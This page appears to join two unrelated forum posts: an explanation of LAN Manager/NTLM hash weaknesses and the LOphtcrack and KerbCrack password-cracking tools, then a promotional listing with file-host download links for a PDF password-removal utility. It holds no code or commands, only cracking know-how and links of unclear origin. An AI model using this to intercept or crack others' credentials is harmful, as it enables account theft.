Windows operating systems based on the LAN Manager networking protocols use an authentication system that consists of transmitting a hashed twenty four byte password across the network from client to server in a challenge/response format. The hashed password from the client is compared with the hash of the same password in the server's database. A match results in authentication. However, the problem lay in the weak hash algorithm and the conversion of the hash into uppercase (thereby eliminating case sensitivity). The algorithm divided the password into seven-character segments and hashed then individually. This allowed the attacker to restrict the password cracking to seven letters and also easier. The weakness of the password hash, coupled with the transmission of the hash across the network in the challenge/response format, made LM-based systems highly susceptible to password interception and brute-force attack by LOphtcrack.

In Windows NT however, case sensitivity was included to strengthen the password, but coupling LM authentication with the NTLM authentication scheme to facilitate backward compatibility with LAN Manager-based systems, resulted in both hashes being sent across the network for authentication and being stored in the password databases. This resulted in LOphtcrack capturing and cracking the much simpler LM password and then applying the results of that broken hash to the NTLM hash to determine any differences.

Hacking Tool: KerbCrack

• KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.

KerbCrack demonstrates the possibility of obtaining user passwords by simply listening to the initial Kerberos logon exchange. Let us explore how this can also be vulnerable to brute force attacks.

In general, encryption protocols such as Kerberos can be circumvented under the following four scenarios:

• The attacker is able to steal the encrypted key — by any means possible.

• The attacker finds a flaw in the implementation of the protocol - attributable to the vendor.

• The attacker finds a flaw in the protocol itself — which is highly unlikely.

• The attacker tries all possible keys in a brute-force approach. This is a possibility.

---Regards,
Amarjit Singh

Portable PDF Password Cracker: Crack PDF Passwords

Portable PDF Password Cracker Enterprise v3.2 | 9.19 MB

PDF Password Cracker is an utility to remove the security on PDF documents (of course, you should have the right to do it, for example, in case of forgotten user/owner password). Only standard PDF security is supported, neither third-party plug-ins nor e-books. Both protection methods are cracked:

1. Restricted operations on file can be disabled (instantly, any Acrobat version up to 8.x).

2. It also can be used to decrypt files you know password for.

Support PDF 1.7 (Acrobat 8.x) files, including 40-bit RC4 decryption, 128-bit RC4 decryption and AES decryption

Instantly remove restrictions on copying, printing and other actions with the file

Do NOT need Adobe Acrobat software

Please note that PDF Password Cracker doesn't work with documents which have user-level passwords (preventing the files from being opened), if both user and owner passwords are unknown; and PDF files protected with any 3rd party security plug-ins such as FileOpen.

Key Features

New PDF 1.7 (Acrobat 8.x) files support, including 64bit and 128bit RC4 decryption

Support AES decryption

Confidentiality (you crack your secret files, not someone from cracking service)

All versions through Adobe Acrobat 8.0 are supported

Decrypt PDF files protected with owner passwords

Instantly remove restrictions on copying, printing and other actions with the file

Full install/uninstall support

Support drag and drop PDF files

Do NOT need Adobe Acrobat software

Support Windows 98, ME, NT, 2000, XP, 2003, Vista systems

Support PDF1.7 (Acrobat 8.x) files, including 40-bit RC4 decryption, 128-bit RC4 decryption and AES decryption

Decryption, compressed files and unencrypted metadata

Decrypt protected Adobe Acrobat PDF files, removing restrictions on printing, editing, copying

Homepage - http://www.crackpdf.com/

Download From HotFile

Download From Uploading